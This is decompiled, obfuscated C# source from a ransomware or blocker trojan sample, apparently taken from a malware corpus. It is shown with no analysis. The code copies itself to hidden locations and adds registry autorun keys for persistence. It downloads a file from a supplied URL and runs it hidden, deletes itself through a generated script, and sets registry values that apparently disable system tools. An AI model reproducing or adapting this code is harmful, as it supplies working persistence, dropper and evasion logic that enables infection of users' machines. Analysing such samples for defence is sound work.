// Decompiled with JetBrains decompiler // Type: A.c3f3e07dcb3874c5b417537b713b608b7 // Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Net; using System.Threading; namespace A { internal class c3f3e07dcb3874c5b417537b713b608b7 { private Mutex c96cf8adc07121b9089c8779f8a06475a; public void c366d1ab19bbdf3ebcee35b30020550b1() { this.cc286121f05a5cd6b2f553091501ad86b(); this.c44a8775ef705aea893c2464d5dc35368(); this.c3a314ec321315e78451e3a3160d4e530(); } private void cc286121f05a5cd6b2f553091501ad86b() { try { this.c96cf8adc07121b9089c8779f8a06475a = new Mutex(true, c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c053a2ccab85d88a8bb0dd1fb41fedf35); this.c96cf8adc07121b9089c8779f8a06475a.ReleaseMutex(); } catch { Environment.Exit(-1); } } private void c3a314ec321315e78451e3a3160d4e530() { string fileName = Process.GetCurrentProcess().MainModule.FileName; if (this.c26b99a61e58734baa67d710bbfd72df9()) return; try { foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e) { if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(str)) System.IO.File.Copy(fileName, str); System.IO.File.SetAttributes(str, FileAttributes.Hidden); } } catch { } try { Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[0] + (object) '"')); Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).SetValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1], (object) ('"'.ToString() + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e[1] + (object) '"')); } catch { } try { this.c96cf8adc07121b9089c8779f8a06475a.Close(); foreach (string str in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e) new Process() { StartInfo = { FileName = str, WindowStyle = ProcessWindowStyle.Hidden } }.Start(); } catch { } Environment.Exit(-1); } public void c32ad199a1a1b21b2f3794ba8b7927c6b(string cf6d6107114ce95c52d91a8d33c162461) { try { this.c96cf8adc07121b9089c8779f8a06475a.Close(); } catch { } try { string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680); new WebClient().DownloadFile(cf6d6107114ce95c52d91a8d33c162461, Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str); new Process() { StartInfo = { FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str), WindowStyle = ProcessWindowStyle.Hidden } }.Start(); } catch { } this.c514ba733b87988f147798195875c1771(); Environment.Exit(-1); } public void ceaf8f38b42d6fe6312cc350ddb4ba0d6() { try { Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[0]); Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1705), true).DeleteValue(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cce2f2518258cebbe2cbf0e7534398ba2[1]); } catch { } try { foreach (string path in c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e) System.IO.File.Delete(path); } catch { } this.c514ba733b87988f147798195875c1771(); Environment.Exit(-1); } private bool c26b99a61e58734baa67d710bbfd72df9() { string[] c712648a24a265f1e1bc00c1dfbecbd3e = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c712648a24a265f1e1bc00c1dfbecbd3e; int index = 0; if (index < c712648a24a265f1e1bc00c1dfbecbd3e.Length) { string c8ce60bab4df112e38d93bdc39407e331 = c712648a24a265f1e1bc00c1dfbecbd3e[index]; if (!c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8f544c7c514248e2027acc2eed25b743(c8ce60bab4df112e38d93bdc39407e331)) return false; } return true; } private void c514ba733b87988f147798195875c1771() { try { string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1796) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1813) + (object) '"' + Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName) + (object) '"' + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1834); TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851)); textWriter.WriteLine(str); textWriter.Close(); new Process() { StartInfo = { FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1851)), UseShellExecute = false, CreateNoWindow = true } }.Start(); } catch { } } private void c44a8775ef705aea893c2464d5dc35368() { try { Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1993), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2006), RegistryValueKind.DWord); } catch { } if (!c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ca20a8f4602f269ed2947b3a5ca5860a2) return; try { Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2009), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord); } catch { } try { Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord); Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord); } catch { } } } }